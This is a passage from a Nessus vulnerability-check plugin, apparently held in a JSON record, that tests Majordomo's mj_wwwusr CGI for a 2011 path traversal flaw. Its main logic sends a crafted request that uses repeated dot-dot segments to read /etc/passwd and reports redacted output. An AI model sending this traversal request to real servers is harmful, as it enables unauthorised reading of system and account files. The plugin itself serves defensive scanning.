value:'D2ExploitPack');\n # http://web.archive.org/web/20110726024342/https://sitewat.ch/en/Advisory/View/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1456bb52\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://attrition.org/pipermail/vim/2011-February/002502.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://seclists.org/bugtraq/2011/Mar/93\"\n );\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/02/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"majordomo_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_keys(\"www/majordomo\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"data_protection.inc\");\n\n# Check that Majordomo is installed on this port.\nport = get_http_port(default:80);\n\ninstall = get_install_from_kb(appname:\"majordomo\", port:port, exit_on_fail:TRUE);\ndir = install[\"dir\"];\n\n# Try and exploit the path traversal.\nexploited = FALSE;\ndotdot = \"./../././../././../././../././../././../././../././../././../././../././../.\";\nurl = \"/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=\" + dotdot + \"/etc/passwd\";\n\n# Make the GET request for /etc/passwd.\nres = http_send_recv3(\n item : dir + url,\n method : \"GET\",\n port : port,\n exit_on_fail : TRUE\n);\n\n# Check if we got /etc/passwd.\nif (!egrep(string:res[2], pattern:\"root:.*:0:[01]:\"))\n exit(0, \"The Majordomo install at \"+build_url(port:port, qs:dir+'/mj_wwwusr')+\" is not affected.\");\n\nif (report_verbosity > 0)\n{\n trailer = \"\";\n if (report_verbosity > 1)\n {\n res[2] = data_protection::redact_etc_passwd(output:res[2]);\n bar = crap(data:\"-\", length:30);\n trailer +=\n 'Here are the contents of the /etc/passwd file :\\n\\n'+\n bar + \" snip \" + bar + '\\n';\n trailer += egrep(string:res[2], pattern:\"^([^:]*:){6}[^:]*$\");\n trailer +=\n bar + \" snip \" + bar + '\\n';\n }\n\n report = get_vuln_report(trailer:trailer, items:install[\"dir\"] + url, port:port);\n\n security_warning(port:port, extra:report);\n}\nelse security_warning(port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}